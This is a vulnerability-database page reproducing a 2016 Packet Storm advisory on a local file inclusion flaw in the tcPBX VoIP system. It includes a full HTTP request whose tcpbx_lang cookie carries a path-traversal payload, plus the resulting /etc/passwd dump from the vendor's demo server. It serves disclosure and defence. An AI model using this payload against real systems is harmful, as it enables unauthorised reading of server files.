Lucene search
K

tcPBX Remote File Disclosure

🗓️ 20 Aug 2016 00:00:00Reported by Ahmed SultanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

tcPBX Remote File Disclosure on vulnerable /var/www/html/tcpbx/index.ph

Code
`Vulnerable hardware : tcpbx voip distro  
Vendor : www.tcpbx.org  
Author : Ahmed sultan (@0x4148)  
Email : [email protected]  
  
Summary : According to the vendor's site ,  
tcPbX is a complete and functional VoIP phone system based on Asterisk open  
source software and CentOS operating system.  
The simplified installation and the new administration portal allow you to  
have a full featured phone system in less than an hour without specific  
skills on linux or asterisk  
  
Vulnerable file : /var/www/html/tcpbx/index.php  
The software suffer from LFI flaw because of the tcpbx_lang parameter isn't  
sanitized before being proceeded in the file  
  
Request  
GET /tcpbx/ HTTP/1.1  
Host: demo.tcpbx.org  
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:47.0)  
Gecko/20100101 Firefox/47.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: tcpbx_lang=../../../../../../../../../../etc/passwd%00;  
PHPSESSID=cupsei1iqmv2bqa81pkcvg4jg1  
Connection: close  
Cache-Control: max-age=0  
-----------------------------------  
Response  
HTTP/1.1 200 OK  
Date: Fri, 19 Aug 2016 15:45:30 GMT  
Server: Apache/2.2.15 (CentOS)  
X-Powered-By: PHP/5.3.3  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 23874  
  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin  
operator:x:11:0:operator:/root:/sbin/nologin  
games:x:12:100:games:/usr/games:/sbin/nologin  
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin  
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin  
nobody:x:99:99:Nobody:/:/sbin/nologin  
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin  
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin  
ntp:x:38:38::/etc/ntp:/sbin/nologin  
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin  
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin  
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin  
apache:x:48:48:Apache:/var/www:/sbin/nologin  
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash  
postfix:x:89:89::/var/spool/postfix:/sbin/nologin  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Aug 2016 00:00Current
7.4High risk
Vulners AI Score7.4
22